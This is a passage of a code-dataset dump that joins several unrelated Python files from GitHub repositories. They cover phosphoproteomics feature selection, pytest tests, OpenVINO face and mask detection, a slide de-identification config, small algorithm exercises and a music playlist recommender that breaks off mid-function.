phosphoproteomics dataframes.\n Filters omics dataframe features to only keep phosphorylation sites which are targets of Landmark genes\n \"\"\"\n\n # load ptm relationships dataset and filter for phosphorylation ptms only\n ptm_df = pd.read_csv('datasets/ptm_relationships.csv',index_col=0)\n ptm_df_phos = ptm_df[ptm_df['modification']=='phosphorylation']\n # load landmark genes list\n landmark_genes_df = pd.read_csv(\"datasets/landmark_genes_LINCS.txt\",sep='\\t')\n landmark_genes = landmark_genes_df['Symbol']\n # filter ptms for landmark gene enzymes only\n ptm_df_phos_lm = ptm_df_phos[ptm_df_phos['enzyme_genesymbol'].isin(landmark_genes)]\n # create list of all psites from filtered dataframe\n lm_psites = []\n for ptm in ptm_df_phos_lm.values:\n substrate = ptm[3] \n residue = ptm[4]\n offset = str(ptm[5])\n psite = f'{substrate}({residue+offset});'\n lm_psites.append(psite)\n\n # find all phosphosites in landmark genes\n phosphosites = []\n for phosphosite in phos_df.columns:\n for psite in lm_psites:\n if psite in phosphosite:\n phosphosites.append(phosphosite)\n # remove duplicates\n phosphosites = list(dict.fromkeys(phosphosites))\n\n return phosphosites\n\n\n\ndef fs_functional_score(phos_df,cutoff=90):\n \"\"\"Feature Selection method for phosphoproteomics dataframes.\n Filters omics dataframe features to only keep phosphorylation sites above functional score cutoff from phosphosite functional score dataset\n \"\"\"\n\n # import phosphosites dataset\n psite_df = pd.read_table('datasets/functional_score_psites.tsv')\n\n # filter dataframe by specified cutoff\n perc = cutoff\n print('cutoff percentile: ', perc)\n # finding cutoffs based on percentile of all values in col\n ranking_score = psite_df['functional_score'].to_numpy()\n # set cutoff\n cutoff = np.percentile(ranking_score, perc)\n print('functional score cutoff: ', cutoff)\n # filter dataframe for rows with with cutoff\n psite_df_cutoff = psite_df[psite_df['functional_score'] > cutoff] \n\n # create list of tuples containg gene and ptm position\n gene_pos_tuples = list(zip(psite_df_cutoff['gene'],psite_df_cutoff['position']))\n\n ranked_phosphosites = []\n # create list of all functional ranked ptms from dataset in phospho dataframe columns\n for tuple in gene_pos_tuples:\n gene = tuple[0]\n pos = str(tuple[1])\n # check for any phosphosites that match the conditions\n psites = list(filter(lambda x: gene in x and pos in x,phos_df.columns)) \n if len(psites) > 0:\n ranked_phosphosites.extend(psites)\n\n # remove duplicates\n ranked_phosphosites = list(dict.fromkeys(ranked_phosphosites))\n\n return ranked_phosphosites\n\n\n\ndef fs_atlas_landmark(phos_df,cutoff=90):\n \"\"\"Feature Selection method for phosphoproteomics dataframes.\n Filters omics dataframe features to only keep phosphorylation sites above median percentile \n or promiscuity index cutoff from phosphosite substrate specificities dataset and are targets of landmark genes\n \"\"\"\n\n # create list of landmark genes\n landmark_genes_df = pd.read_csv(\"datasets/landmark_genes_LINCS.txt\",sep='\\t')\n landmark_genes = landmark_genes_df['Symbol']\n\n # load substrate specificity dataset filtered for substrate specificities of landmark genes only\n atlas_LM_df = pd.read_csv('datasets/atlas_LM_ptms.csv')\n # remove empty columns\n for col in atlas_LM_df.columns:\n if 'Unnamed:' in col:\n atlas_LM_df.drop(col, axis=1, inplace=True)\n\n phos_df_genes = []\n for col in phos_df.columns:\n phos_df_genes.append(col.split('(')[0])\n # remove duplicates\n phos_df_genes = list(dict.fromkeys(phos_df_genes))\n\n ## uniprot genes mapped to ids for all genes not in substrate specificity dataset\n\n uniprot_mapping_df = pd.read_csv(\"datasets/uniprot.tsv\",sep='\\t')\n swissprot_mapping_df = pd.read_csv(\"datasets/uniprot_swissprot.tsv\",sep='\\t')\n uniprot_all_mapping = pd.concat([uniprot_mapping_df, swissprot_mapping_df], axis=0).reset_index()\n\n # create dictionary\n gene_id_dict = {}\n for ind in uniprot_all_mapping.index:\n gene = uniprot_all_mapping['From'][ind]\n id = uniprot_all_mapping['Entry'][ind]\n gene_id_dict[id] = gene\n\n # find which genes are in substrate specificity dataset using uniprot id\n extra_ids = []\n for id in gene_id_dict:\n if id in atlas_LM_df['Database Uniprot Accession'].to_list():\n extra_ids.append(id)\n\n # filter dataframe for rows using genes appearing either in 'Gene', 'Alternative Gene Names' \n # or 'Protein' column of substrate specificity dataset\n atlas_LM_filtered_gene = atlas_LM_df[(atlas_LM_df['Gene'].isin(phos_df_genes)) | \n (atlas_LM_df['Protein'].isin(phos_df_genes)) | \n (atlas_LM_df['Alternative Gene Names'].isin(phos_df_genes))]\n # filter dataframe for rows with additional genes using uniprot ids\n atlas_LM_filtered_id = atlas_LM_df[atlas_LM_df['Database Uniprot Accession'].isin(extra_ids)]\n # combine into single dataframe\n atlas_LM_filtered = pd.concat([atlas_LM_filtered_gene, atlas_LM_filtered_id], axis=0).reset_index()\n\n\n\n # set cutoff percentile 0-100\n cutoff_perc = cutoff\n # set cutoff type to promiscuity index or median percentile\n cutoff_type = 'median_perc' # set to 'prom_index' or 'median_perc'\n\n print('cutoff percentile: ', cutoff_perc)\n\n if cutoff_type == 'prom_index': # using promiscuity index cutoff\n # calculate cutoff\n ranking_prom_index = atlas_LM_filtered['promiscuity_index'].to_numpy()\n print('promiscuity index cutoff: ', np.percentile(ranking_prom_index, cutoff_perc))\n # filter dataframe\n cutoff = np.percentile(ranking_prom_index, cutoff_perc) # change number to cutoff percentile\n atlas_LM_cutoff = atlas_LM_filtered[atlas_LM_filtered['promiscuity_index'] > cutoff]\n\n elif cutoff_type == 'median_perc': # using median percentile cutoff\n # calculate cutoff\n ranking_median_perc = atlas_LM_filtered['median_percentile'].to_numpy()\n print('median percentile cutoff: ', np.percentile(ranking_median_perc, cutoff_perc))\n # filter dataframe\n cutoff = np.percentile(ranking_median_perc, cutoff_perc) # change number to cutoff percentile\n atlas_LM_cutoff = atlas_LM_filtered[atlas_LM_filtered['median_percentile'] > cutoff] \n\n # create list of gene-phosphosite pairs within substrate specificity dataset filtered by median cutoff\n formatted_phosphosites = []\n for ind in atlas_LM_cutoff.index:\n gene = atlas_LM_cutoff.loc[ind]['Gene']\n phosphosite = atlas_LM_cutoff.loc[ind]['Phosphosite']\n formatted_phosphosites.append(f'{gene}({phosphosite});')\n\n # find all phos_df features containing cutoff phosphosites\n phosphosites = []\n for psite in phos_df.columns:\n for cutoff_psite in formatted_phosphosites:\n if cutoff_psite in psite:\n phosphosites.append(psite)\n # remove duplicates\n phosphosites = list(dict.fromkeys(phosphosites))\n\n return phosphosites\n\n\n\n\ndef true_phosphosite_filter(phosphosites):\n \"\"\"Takes a list of phosphorylation sites and removes false positive phosphosites \n based on dataset filtered to only contain true positive phosphosites\n \"\"\"\n\n\n # import dataset for phosphosite quality control\n data_path = \"datasets/filtered_psites.csv\"\n df = pd.read_csv(data_path,header=2,low_memory=False)\n true_psites_vals = df[['GENE','Site','MOD_RD']].values\n\n # create list of true phosphosites formatted for feature selection\n true_psites = []\n for psite in true_psites_vals:\n gene = psite[0]\n residue = psite[1]\n offset = psite[2]\n # add to list\n true_psites.append(f'{gene}({residue}{offset});')\n \n # check if phosphosites from feature select contains true phosphosites which will be added to new list\n filtered_phosphosites = []\n for psite in phosphosites:\n res = any(ele in psite for ele in true_psites)\n if res == True:\n filtered_phosphosites.append(psite)\n \n return filtered_phosphosites","repo_name":"Nasim-MI/DRP-MSc-project","sub_path":"scripts/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":9260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26149205957","text":"import pytest\nfrom datetime import datetime\nimport numpy as np\n\nfrom numpy_solution import group_adjust\n\n\ndef test_three_groups():\n vals = [1, 2, 3, 8, 5]\n grps_1 = ['USA', 'USA', 'USA', 'USA', 'USA']\n grps_2 = ['MA', 'MA', 'MA', 'RI', 'RI']\n grps_3 = ['WEYMOUTH', 'BOSTON', 'BOSTON', 'PROVIDENCE', 'PROVIDENCE']\n weights = [.15, .35, .5]\n\n adj_vals = group_adjust(vals, [grps_1, grps_2, grps_3], weights)\n # 1 - (USA_mean*.15 + MA_mean * .35 + WEYMOUTH_mean * .5)\n # 2 - (USA_mean*.15 + MA_mean * .35 + BOSTON_mean * .5)\n # 3 - (USA_mean*.15 + MA_mean * .35 + BOSTON_mean * .5)\n # etc ...\n # Plug in the numbers ...\n # 1 - (.15 * 3.8 + .35 * 2.0 + .5 * 1.0) = -0.770\n # 2 - (.15 * 3.8 + .35 * 2.0 + .5 * 2.5) = -0.520\n # 3 - (.15 * 3.8 + .35 * 2.0 + .5 * 2.5) = 0.480\n # etc...\n\n answer = [-0.770, -0.520, 0.480, 1.905, -1.095]\n for ans, res in zip(answer, adj_vals):\n assert abs(ans - res) < 1e-5\n\n\ndef test_two_groups():\n vals = [1, 2, 3, 8, 5]\n grps_1 = ['USA', 'USA', 'USA', 'USA', 'USA']\n grps_2 = ['MA', 'RI', 'CT', 'CT', 'CT']\n weights = [.65, .35]\n\n adj_vals = group_adjust(vals, [grps_1, grps_2], weights)\n # 1 - (.65 * 3.8 + .35 * 1.0) = -1.82\n # 2 - (.65 * 3.8 + .35 * 2.0) = -1.17\n # 3 - (.65 * 3.8 + .35 * 5.33333) = -1.33666\n answer = [-1.82, -1.17, -1.33666, 3.66333, 0.66333]\n for ans, res in zip(answer, adj_vals):\n assert abs(ans - res) < 1e-5\n\n\ndef test_missing_vals():\n # If you're using NumPy or Pandas, use np.NaN\n # If you're writing pyton, use None\n vals = [1, np.NaN, 3, 5, 8, 7]\n #vals = [1, None, 3, 5, 8, 7]\n grps_1 = ['USA', 'USA', 'USA', 'USA', 'USA', 'USA']\n grps_2 = ['MA', 'RI', 'RI', 'CT', 'CT', 'CT']\n weights = [.65, .35]\n\n adj_vals = group_adjust(vals, [grps_1, grps_2], weights)\n\n # This should be None or np.NaN depending on your implementation\n # please feel free to change this line to match yours\n answer = [-2.47, np.NaN, -1.170, -0.4533333, 2.54666666, 1.54666666]\n #answer = [-2.47, None, -1.170, -0.4533333, 2.54666666, 1.54666666]\n\n for ans, res in zip(answer, adj_vals):\n if ans is None:\n assert res is None\n elif np.isnan(ans):\n assert np.isnan(res)\n else:\n assert abs(ans - res) < 1e-5\n\n\ndef test_weights_len_equals_group_len():\n # Need to have 1 weight for each group\n\n # vals = [1, np.NaN, 3, 5, 8, 7]\n vals = [1, None, 3, 5, 8, 7]\n grps_1 = ['USA', 'USA', 'USA', 'USA', 'USA', 'USA']\n grps_2 = ['MA', 'RI', 'RI', 'CT', 'CT', 'CT']\n weights = [.65]\n\n with pytest.raises(ValueError):\n group_adjust(vals, [grps_1, grps_2], weights)\n pass\n\n\ndef test_group_len_equals_vals_len():\n # The groups need to be same shape as vals\n vals = [1, None, 3, 5, 8, 7]\n grps_1 = ['USA']\n grps_2 = ['MA', 'RI', 'RI', 'CT', 'CT', 'CT']\n weights = [.65]\n\n with pytest.raises(ValueError):\n group_adjust(vals, [grps_1, grps_2], weights)\n pass\n\n\ndef test_performance():\n #vals = 1000000*[1, None, 3, 5, 8, 7]\n # If you're doing numpy, use the np.NaN instead\n vals = 1000000 * [1, np.NaN, 3, 5, 8, 7]\n grps_1 = 1000000 * [1, 1, 1, 1, 1, 1]\n grps_2 = 1000000 * [1, 1, 1, 1, 2, 2]\n grps_3 = 1000000 * [1, 2, 2, 3, 4, 5]\n weights = [.20, .30, .50]\n\n start = datetime.now()\n group_adjust(vals, [grps_1, grps_2, grps_3], weights)\n end = datetime.now()\n diff = end - start\n print(diff)\n pass\n","repo_name":"acondliffe1/group-adjust","sub_path":"unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35476964023","text":"# input : num = [2,7,11,15]\n#target : 9\n# output : [0,1] (list)]\n\n#브루트포스(완전탐색, 완전 매칭)\n\ndef twoSum(nums, target):\n for i,n in enumerate(nums):\n complement = target - n\n\n if complement in nums[i +1:]:\n return [nums.index(n), nums[i + 1:]].index(complement) + (i + 1) ","repo_name":"woohyun1031/Algorithm","sub_path":"python/d_0115/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36484812723","text":"import logging\n\n__version__ = '0.3'\n\n\nclass ZPMException(Exception):\n \"\"\"\n Basic exception to signal ZPM-specific errors. Useful for cases in which an\n exception must be differentiated from the more general built-in exception\n types.\n \"\"\"\n\n\ndef get_logger(name):\n log = logging.getLogger(name)\n _stream_handler = logging.StreamHandler()\n _stream_handler.setFormatter(\n logging.Formatter(fmt='%(levelname)s:%(name)s: %(message)s')\n )\n log.addHandler(_stream_handler)\n return log\n\nLOG_LEVEL_MAP = dict(\n debug=logging.DEBUG,\n info=logging.INFO,\n warning=logging.WARNING,\n error=logging.ERROR,\n critical=logging.CRITICAL,\n)\n","repo_name":"larsbutler/zerovm-cli","sub_path":"zpmlib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"27203836742","text":"import json\nimport os\n\nfrom matplotlib import pyplot as plt\n\nfrom angorapy.common.const import PATH_TO_EXPERIMENTS, QUALITATIVE_COLOR_PALETTE\n\nexperiment_ids = ['1653053413', '1655284851', '1654708464']\n\nreward_developments = {}\nfor id in experiment_ids:\n with open(os.path.join(\"../../../\", PATH_TO_EXPERIMENTS, str(id), \"meta.json\")) as f:\n meta = json.load(f)\n with open(os.path.join(\"../../../\", PATH_TO_EXPERIMENTS, str(id), \"progress.json\")) as f:\n progress = json.load(f)\n\n exp_name = meta[\"hyperparameters\"][\"distribution\"]\n reward_developments[exp_name] = progress[\"rewards\"][\"mean\"]\n\nfor i, (name, rewards) in enumerate(reward_developments.items()):\n plt.plot(rewards[:800], label=name, color=QUALITATIVE_COLOR_PALETTE[i])\n\nplt.title(\"In-Hand Object Manipulation\")\nplt.xlabel(\"Cycle\")\nplt.ylabel(\"Avg. Episode Return\")\nplt.legend()\n\nplt.xlim(0, 800)\nplt.ylim(0)\n\nplt.gcf().set_size_inches(16, 4)\nplt.show()\n# plt.savefig(\"../../../docs/figures/manipulate-progress.pdf\", format=\"pdf\", bbox_inches=\"tight\")","repo_name":"ccnmaastricht/angorapy","sub_path":"angorapy/analysis/plotting/plot_experiment_comparison.py","file_name":"plot_experiment_comparison.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"43680196885","text":"\"\"\"\nSplit and interactively page a string (stdin, for stream\nredirection) or file of text\n\"\"\"\n\nimport sys\n\nOKBLUE = '\\033[94m'\nENDC = '\\033[0m'\n\ndef getreply():\n \"\"\"\n read a reply key from an interactive user\n even if stdin redirected to a file or pipe\n \"\"\"\n inputstr = f'{OKBLUE}More?{ENDC}'\n if sys.stdin.isatty():\n return input(inputstr).encode()\n else:\n if sys.platform[:3] == 'win':\n import msvcrt\n for ch in inputstr:\n msvcrt.putch(ch.encode())\n key = msvcrt.getche()\n msvcrt.putch(b'\\n')\n return key\n else:\n assert False, 'platform not supported'\n\ndef more(text, numlines=15):\n \"\"\"\n splits a string of text (by \\n) and\n interactively pages it with user input \n \"\"\"\n lines = text.splitlines()\n while lines:\n chunk = lines[:numlines]\n lines = lines[numlines:]\n for line in chunk:\n print(line)\n if lines and getreply() not in [b'', b'y', b'Y', b'\\r']:\n break\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n more(sys.stdin.read(), 10)\n else:\n more(open(sys.argv[1]).read(), 10)\n","repo_name":"jeyeong/Misc.-Python-Tools","sub_path":"1. String Pager (sys)/more.py","file_name":"more.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36385277350","text":"import os\nimport hashlib\nimport re\nfrom batchq.core.errors import HashException\nimport zipfile\nimport copy\n\ncmdhasher = \"md5\"\nhasher_routine = \"md5\"\n\ndef zipper(filename, relative_path, pwd = None):\n orgp = os.getcwd()\n if not pwd is None: os.chdir(pwd)\n zfile = zipfile.ZipFile(filename, 'w')\n\n def add(p): \n if os.path.isfile(p):\n zfile.write(p)\n return \n\n for file in os.listdir(p):\n add( os.path.join(p, file) )\n\n add(relative_path)\n zfile.close()\n os.chdir(orgp)\n\n\n\ndef which (filename, lookin = [], env = None):\n if os.path.dirname(filename) != '':\n if os.access (filename, os.X_OK):\n return filename\n\n if env is None:\n env = os.environ\n\n lookin = lookin + env['PATH'].split(os.pathsep) if 'PATH' in env else lookin\n lookin.append(os.defpath)\n\n for path in lookin:\n f = os.path.join(path, filename)\n if os.access(f, os.X_OK):\n return f\n return None\n\n\ndef environment (**kwargs):\n nenv = copy.deepcopy(os.environ)\n nenv.update(kwargs)\n return nenv\n\n\n\ndef filelist(path, list = None): \n \"\"\"\n Computes the a file list of the given path.\n \"\"\"\n if list is None:\n list = []\n for filename in sorted(os.listdir(path)): \n newpath = os.path.join(path, filename) \n\n if os.path.isfile(newpath):\n list +=[newpath]\n else:\n list = filelist(newpath, list) \n return list\n\ndef hash_filelist(list):\n \"\"\"\n Computes the hash of a filelist. \n \"\"\"\n global hasher_routine\n haobj = hashlib.new(hasher_routine)\n for filename in list:\n if os.path.isfile(filename):\n f = file(filename ,'rb') \n haobj.update(f.read())\n f.close()\n hex =haobj.hexdigest()\n\n return hex\n\ndef directory_hash(dir):\n \"\"\"\n Computes the hash of a filelist. \n \"\"\"\n if not os.path.isdir(dir):\n raise HashException(\"'%s' is not a directory.\" % dir)\n\n return hash_filelist(sorted(filelist(dir)))\n\ndef file_hash(file):\n \"\"\"\n Computes the hash of a file. \n \"\"\"\n if not os.path.isfile(file):\n raise HashException(\"'%s' is not a file.\" % file)\n return hash_filelist([file])\n\ndef hash(path):\n if os.path.isfile(path):\n return file_hash(path)\n if os.path.isdir(path):\n return directory_hash(path)\n\n raise HashException(\"File or directory does not exist.\")\n\ndef bash_hash_directory(dir):\n \"\"\"\n Gives the equivalent bash command to directory_hash(dir).\n \"\"\"\n print(\"DEPRECATED !!!!!!\")\n global cmdhasher\n# return \"find '%s' -type f -print0 | sort -z\" % (dir)\n return \"find '%s' -type f -print0 | sort -z | xargs -0 cat | %s\" % (dir, cmdhasher)\n\ndef bash_hash_file(file):\n \"\"\"\n Gives the equivalent bash command to file_hash(dir).\n \"\"\"\n print(\"DEPRECATED !!!!!!\")\n global cmdhasher\n return \"%s '%s'\" % (cmdhasher, file)\n\ndef bash_hash_pattern():\n print(\"DEPRECATED !!!!!!\")\n return r\"(?P[a-fA-F\\d]{32})\"\n\ndef bash_extract_hash(response):\n print(\"DEPRECATED !!!!!!\")\n# return response\n searcher_for = re.compile(bash_hash_pattern())\n match = searcher_for.search(response)\n if not match:\n raise HashException(\"The output '%s' did not contain a hash string of the expected format.\"%response)\n\n return match.group(\"hash\")\n\n","repo_name":"troelsfr/BatchQ","sub_path":"batchq/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11236015492","text":"import cv2\nimport numpy as np\n\nfrom pyvino_utils.models.openvino_base.base_model import Base\n\n__all__ = [\n \"FaceDetection\",\n \"MaskDetection\",\n]\n\n\nCOLOR = {\"Green\": (0, 255, 0), \"Red\": (0, 0, 255)}\n\n\nclass FaceDetection(Base):\n \"\"\"Class for the Face Detection Model.\"\"\"\n\n def __init__(\n self,\n model_name,\n source_width=None,\n source_height=None,\n device=\"CPU\",\n threshold=0.60,\n extensions=None,\n **kwargs,\n ):\n super().__init__(\n model_name,\n source_width,\n source_height,\n device,\n threshold,\n extensions,\n **kwargs,\n )\n\n def preprocess_output(self, inference_results, image, show_bbox=False, **kwargs):\n \"\"\"Draw bounding boxes onto the Face Detection frame.\"\"\"\n results = {}\n if not (self._init_image_w and self._init_image_h):\n raise RuntimeError(\"Initial image width and height cannot be None.\")\n if len(inference_results) == 1:\n inference_results = inference_results[0]\n\n bbox_coord = []\n for box in inference_results[0][0]: # Output shape is 1x1xNx7\n conf = box[2]\n if conf >= self.threshold:\n xmin = int(box[3] * self._init_image_w)\n ymin = int(box[4] * self._init_image_h)\n xmax = int(box[5] * self._init_image_w)\n ymax = int(box[6] * self._init_image_h)\n bbox_coord.append((xmin, ymin, xmax, ymax))\n if show_bbox:\n self.draw_output(image, xmin, ymin, xmax, ymax, **kwargs)\n\n results[\"image\"] = image\n results[\"bbox_coord\"] = bbox_coord\n return results\n\n @staticmethod\n def draw_output(\n image,\n xmin,\n ymin,\n xmax,\n ymax,\n label=\"Person\",\n padding_size=(0.05, 0.25),\n scale=2,\n thickness=2,\n **kwargs,\n ):\n _label = None\n if kwargs.get(\"mask_detected\"):\n _label = (\n (f\"{label} Wearing Mask\", COLOR[\"Green\"])\n if float(kwargs.get(\"mask_detected\")) > kwargs.get(\"threshold\", 0.1)\n else (f\"{label} NOT wearing a Mask!!!\", COLOR[\"Red\"])\n )\n # print(_label)\n\n label = _label if _label is not None else (label, COLOR[\"Green\"])\n\n cv2.rectangle(\n image, (xmin, ymin), (xmax, ymax,), color=label[1], thickness=thickness,\n )\n ((label_width, label_height), _) = cv2.getTextSize(\n label[0], cv2.FONT_HERSHEY_PLAIN, fontScale=scale, thickness=thickness,\n )\n\n cv2.putText(\n image,\n label[0],\n org=(image.shape[0] // 3, image.shape[1] // 3),\n fontFace=cv2.FONT_HERSHEY_PLAIN,\n fontScale=scale,\n color=label[1],\n thickness=thickness,\n )\n\n\nclass MaskDetection(Base):\n \"\"\"Class for the Mask Detection Model.\"\"\"\n\n def __init__(\n self,\n model_name,\n source_width=None,\n source_height=None,\n device=\"CPU\",\n threshold=0.60,\n extensions=None,\n **kwargs,\n ):\n super().__init__(\n model_name,\n source_width,\n source_height,\n device,\n threshold,\n extensions,\n **kwargs,\n )\n\n def preprocess_output(self, inference_results, image, show_bbox=False, **kwargs):\n results = {}\n results[\"flattened_predictions\"] = np.vstack(inference_results).ravel()\n results[\"image\"] = image\n return results\n\n def draw_output(\n self, image, inference_results, **kwargs,\n ):\n pass\n","repo_name":"mmphego/face_mask_detection_openvino","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"48"} +{"seq_id":"7647316079","text":"import girder.utility.config\n\nCONFIG_SECTION = 'wsi_deid'\nNUMERIC_VALUES = (\n r'^\\s*[+-]?(\\d+([.]\\d*)?([eE][+-]?\\d+)?|[.]\\d+([eE][+-]?\\d+)?)(\\s*,\\s*[+-]?'\n r'(\\d+([.]\\d*)?([eE][+-]?\\d+)?|[.]\\d+([eE][+-]?\\d+)?))*\\s*$'\n)\n\ndefaultConfig = {\n 'redact_macro_square': False,\n 'always_redact_label': False,\n 'require_redact_category': True,\n 'require_reject_reason': False,\n 'edit_metadata': False,\n 'add_title_to_label': True,\n 'show_import_button': True,\n 'show_export_button': True,\n 'show_next_item': True,\n 'show_metadata_in_lists': True,\n 'show_next_folder': True,\n 'no_redact_control_keys': {\n r'^internal;aperio_version$': '',\n r'^internal;openslide;openslide\\.(?!comment$)': '',\n r'^internal;openslide;tiff\\.(XResolution|YResolution)$': NUMERIC_VALUES,\n r'^internal;openslide;tiff\\.ResolutionUnit$': '',\n },\n 'no_redact_control_keys_format_aperio': {\n r'^internal;openslide;aperio\\.(AppMag|MPP|Exposure (Time|Scale))$': NUMERIC_VALUES,\n },\n 'no_redact_control_keys_format_hamamatsu': {\n r'^internal;openslide;hamamatsu\\.SourceLens$': NUMERIC_VALUES,\n },\n 'no_redact_control_keys_format_philips': {},\n 'no_redact_control_keys_format_isyntax': {},\n 'hide_metadata_keys': {\n r'^internal;openslide;openslide\\.level\\[': NUMERIC_VALUES,\n },\n 'hide_metadata_keys_format_aperio': {\n r'^internal;openslide;(openslide\\.comment|tiff\\.ImageDescription)$': '',\n (\n r'^internal;openslide;aperio\\.(Original(Height|Width)|Left|Top|Right|Bottom'\n r'|LineArea(X|Y)Offset|LineCameraSkew|Focus Offset|StripeWidth|DisplayColor)'\n ): NUMERIC_VALUES,\n },\n 'hide_metadata_keys_format_hamamatsu': {\n (\n r'^internal;openslide;hamamatsu\\.((AHEX|MHLN|YRNP|zCoarse|zFine)\\['\n r'|(X|Y)OffsetFromSlideCentre|ccd.(width|height)|(focalplane|slant)\\.(left|right)'\n r'(top|bottom)|stage.center)'\n ): NUMERIC_VALUES,\n },\n 'hide_metadata_keys_format_philips': {},\n 'hide_metadata_keys_format_isyntax': {\n r'^internal;(xml;|wsi;|xml$|wsi$)': '',\n r'^internal;isyntax;(is_UFS|is_UFSb|is_UVS|is_philips|isyntax_file_version)$': '',\n r'^internal;isyntax;(num_images|scanner_rack_priority)$': NUMERIC_VALUES,\n },\n 'upload_metadata_for_export_report': [\n 'ImageID', 'Proc_Seq', 'Proc_Type', 'Slide_ID', 'Spec_Site', 'TokenID',\n ],\n 'import_text_association_columns': [],\n 'folder_name_field': 'TokenID',\n 'image_name_field': 'ImageID',\n 'validate_image_id_field': True,\n 'reject_reasons': [{\n 'category': 'Cannot_Redact',\n 'text': 'Cannot redact PHI',\n 'key': 'Cannot_Redact'\n }, {\n 'category': 'Slide_Quality',\n 'text': 'Slide Quality',\n 'types': [\n {'key': 'Chatter_Tears', 'text': 'Chatter/tears in tissue'},\n {'key': 'Folded_Tissue', 'text': 'Folded tissue'},\n {'key': 'Overstaining', 'text': 'Overstaining'},\n {'key': 'Cover_Slip', 'text': 'Cover slip issues'},\n {'key': 'Debris', 'text': 'Debris or dust'},\n {'key': 'Air_Bubbles', 'text': 'Air bubbles'},\n {'key': 'Pathologist_Markings', 'text': \"Pathologist's Markings\"},\n {'key': 'Other_Slide_Quality', 'text': 'Other'}\n ]\n }, {\n 'category': 'Image_Quality',\n 'text': 'Image Quality',\n 'types': [\n {'key': 'Out_Of_Focus', 'text': 'Out of focus'},\n {'key': 'Low_Resolution', 'text': 'Low resolution'},\n {'key': 'Other_Image_Quality', 'text': 'Other'}\n ]\n }],\n 'phi_pii_types': [\n {\n 'category': 'Personal_Info',\n 'text': 'Personal Information',\n 'types': [\n {'key': 'Patient_Name', 'text': 'Patient Name'},\n {'key': 'Patient_DOB', 'text': 'Date of Birth '},\n {'key': 'SSN', 'text': 'Social Security Number'},\n {'key': 'Other_Personal', 'text': 'Other Personal'}\n ]\n },\n {\n 'category': 'Demographics',\n 'key': 'Demographics',\n 'text': 'Demographics'\n },\n {\n 'category': 'Facility_Physician',\n 'key': 'Facility_Physician',\n 'text': 'Facility/Physician Information'\n },\n {\n 'category': 'Other_PHIPII',\n 'key': 'Other_PHIPII',\n 'text': 'Other PHI/PII'\n }\n ]\n}\n\n\ndef getConfig(key=None, fallback=None):\n configDict = girder.utility.config.getConfig().get(CONFIG_SECTION) or {}\n if key is None:\n config = defaultConfig.copy()\n config.update(configDict)\n return config\n if key in configDict:\n return configDict[key]\n if key in defaultConfig:\n return defaultConfig[key]\n return fallback\n","repo_name":"DigitalSlideArchive/DSA-WSI-DeID","sub_path":"wsi_deid/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"22956342741","text":" \n \n# 숫자 카드 게임\n# n행 n열로 구성\n# 1. 각 행에서 최소값을 추출\n# 2. 추출된 최솟값들에서 최대값 출력\n \n\n# 행, 열 입력 받기\nn, m = map(int, input().split())\n\nresult = 0\n\nfor i in range(n):\n data = list(map(int, input().split()))\n \n # min() 함수로 최소값 찾기\n # min_value의 초기값은 n의 최대 범위 설정값 이하\n min_value = 10001\n\n # 반복문과 min()함수를 통해 최소값 저장\n for a in data:\n min_value = min(min_value, a)\n\n # 결과는 최소값 중의 최대값\n result = max(result, min_value)\n \n# 결과 출력\nprint(result)\n","repo_name":"laphayen/coding_test_python","sub_path":"etc/number card game loop.py","file_name":"number card game loop.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7354531183","text":"# 作者:宁方笑\n# 开发时间:2021/8/7 21:19\nclass ListNode:\n def __init__(self,val,next):\n self.val=val\n self.next=next\n\ndef swapPairs(head): #递归\n if not head or not head.next:\n return head\n newHead = head.next\n head.next = swapPairs(newHead.next)\n newHead.next = head\n return newHead","repo_name":"opensourcex123/LeetCode","sub_path":"demo134 两两交换链表中的结点.py","file_name":"demo134 两两交换链表中的结点.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14079052216","text":"import os\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport sklearn\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport json\nfrom tqdm import tqdm\ntqdm.pandas()\n\ndef remove_seen(seen, l):\n seen = set(seen)\n return [x for x in l if not (x in seen)]\n\ndef rec_each_song(playlst_id, song_id, songs_len):\n # 전역변수 : sim_df, train, val, best300, train_songs\n seen_song = val[val['id'] == playlst_id]['songs'].values[0]\n # songs_len이 0이 아닌 경우\n if songs_len != 0: \n n = 100//songs_len + 20 # 23 \n rec_lst = []\n # song_id가 sim_df에 있는 경우\n if song_id in sim_df.columns:\n series = sim_df[song_id].sort_values(ascending=False)\n series = series.drop(song_id)\n rec_lst = series.head(n).to_frame().index.tolist()\n return remove_seen(seen_song, rec_lst) \n # song_id가 sim_df에 없는 경우\n else:\n if song_id in train_songs.values.tolist(): # song_id가 train에 있는 경우\n playlst_ids = train_songs[train_songs==song_id].index.tolist()\n dict_like = {}\n for i in 